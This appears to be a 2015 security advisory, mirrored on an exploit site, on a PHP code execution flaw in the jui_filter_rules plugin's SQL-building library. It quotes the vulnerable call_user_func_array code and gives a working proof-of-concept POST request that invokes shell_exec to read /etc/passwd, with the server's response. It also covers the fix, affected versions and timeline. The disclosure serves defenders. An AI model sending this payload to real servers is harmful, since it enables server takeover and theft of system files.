jQuery jui_filter_rules PHP Code Execution Vulnerability

2015-02-18T00:00:00
ID 1337DAY-ID-23306
Type zdt
Reporter Timo Schmid
Modified 2015-02-18T00:00:00

Description

The jQuery jui_filter_rules parsing library suffers from an arbitrary php remote code execution vulnerability.

                                        
                                            PHP Code Execution in jui_filter_rules Parsing Library
======================================================
Researcher: Timo Schmid <[email protected]>


Description
===========
jui_filter_rules[1] is a jQuery plugin which allows users to generate a
ruleset
which could be used to filter datasets inside a web application.

The plugin also provides a PHP library to turn the user submitted
ruleset into
SQL where statements for server side filtering.
This PHP library contains a feature which allows to convert the
submitted filter
values with server side functions. These functions can be specified
within the
ruleset, which leads to an arbitrary PHP code execution.


Exploitation Technique
======================
Remote


Severity Level
==============
Critical


CVSS Base Score
===============
6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)


CVE-ID
======
<unassigned>


Impact
======
By using the provided rule parsing library to generate SQL statements, an
attacker is capable of executing arbitrary PHP code in the context of the
web server. This could lead to a full compromise of the web server. The
attack vector could be limited by existing validation mechanisms around the
library, but this would require a partial manual parsing of the user
supplied
rules.


Status
======
Reported


Vulnerable Code Section
=======================
server_side/php/jui_filter_rules.php:
[...]
private function create_filter_value_sql($filter_type, $operator_type, ...
[...]
    if(is_array($filter_value_conversion_server_side)) {
        $function_name =
$filter_value_conversion_server_side['function_name'];
        $args = $filter_value_conversion_server_side['args'];
        $arg_len = count($args);
        for($i = 0; $i < $vlen; $i++) {
            // create arguments values for this filter value
            $conversion_args = array();
            for($a = 0; $a < $arg_len; $a++) {
                if(array_key_exists('filter_value', $args[$a])) {
                    array_push($conversion_args, $a_values[$i]);
                }
                if(array_key_exists('value', $args[$a])) {
                    array_push($conversion_args, $args[$a]['value']);
                }
            }
            // execute user function and assign return value to filter value
            try {
                $a_values[$i] = call_user_func_array($function_name,
$conversion_args);
            } catch(Exception $e) {
                $this->last_error = array(
                    'element_rule_id' => $element_rule_id,
                    'error_message' => $e->getMessage()
                );
                break;
            }
        }
    }
[...]

The provided PHP parsing library allows to specify a PHP function to convert
the supplied filter value on the server side. This leads ultimatively to
code
execution through attacker supplied input. As no whitelist approach is used,
any existing PHP function could be executed (including shell commands).


Proof of Concept
================
Using the demo application from the git repository:

Executing shell_exec('cat /etc/passwd')

Request:
POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 471

a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
ate

Response:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html

{"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin
COSMOS:/root:/
bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns
ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga
mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va
r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s
pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr
oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}



Solution
========
This functionality should generally be removed or replaced by a mapping/
whitelist approach and strict type filtering to prevent arbitrary code
execution.


Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)


Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git
0b61463cd02cc1814046b516242779b29ba7d1e1)


References
==========
[1] http://www.pontikis.net/labs/jui_filter_rules
[2] https://www.owasp.org/index.php/Code_Injection
[3] https://www.ernw.de/download/BC-1501.txt
[4] https://bufferoverflow.eu/BC-1501.txt


Advisory-ID
===========
BC-1501


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

#  0day.today [2018-01-08]  #